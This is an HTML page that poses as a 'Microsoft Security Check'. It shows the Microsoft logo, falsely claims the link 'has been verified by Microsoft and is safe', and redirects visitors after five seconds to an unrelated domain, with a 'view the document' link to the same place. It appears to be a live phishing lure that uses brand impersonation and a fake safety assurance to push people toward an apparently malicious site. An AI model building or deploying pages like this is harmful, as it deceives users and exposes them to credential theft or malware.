<!DOCTYPE html>

<html lang="en"><head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="UTF-8">
  <title>Microsoft Security Check</title>
  <meta http-equiv="refresh" content="5;url=https://babyssiweise.com/ho8torD/">
  <style>
    body {
      font-family: "Segoe UI", Tahoma, Geneva, Verdana, sans-serif;
      background-color: #f3f3f3;
      color: #333;
      text-align: center;
      padding-top: 100px;
    }
    .box {
      background-color: #fff;
      padding: 40px;
      margin: auto;
      width: 50%;
      box-shadow: 0 0 10px rgba(0,0,0,0.1);
      border-radius: 10px;
    }
    .microsoft-logo {
      height: 50px;
      margin-bottom: 20px;
    }
    .status {
      font-size: 20px;
      color: green;
      margin-top: 20px;
    }
  </style>
</head>
<body>
  <div class="box">
    <img class="microsoft-logo" alt="Microsoft Logo" src="https://upload.wikimedia.org/wikipedia/commons/4/44/Microsoft_logo.svg">
    <h2>Security Check Passed</h2>
    <p>This link has been verified by Microsoft and is safe to visit.</p>
    <p class="status">Redirecting to the secure site...</p>
    <p>If you are not redirected automatically, 
      <a href="https://babyssiweise.com/ho8torD/">
        click here to view the document
      </a>.
    </p>
  </div>


</body></html>
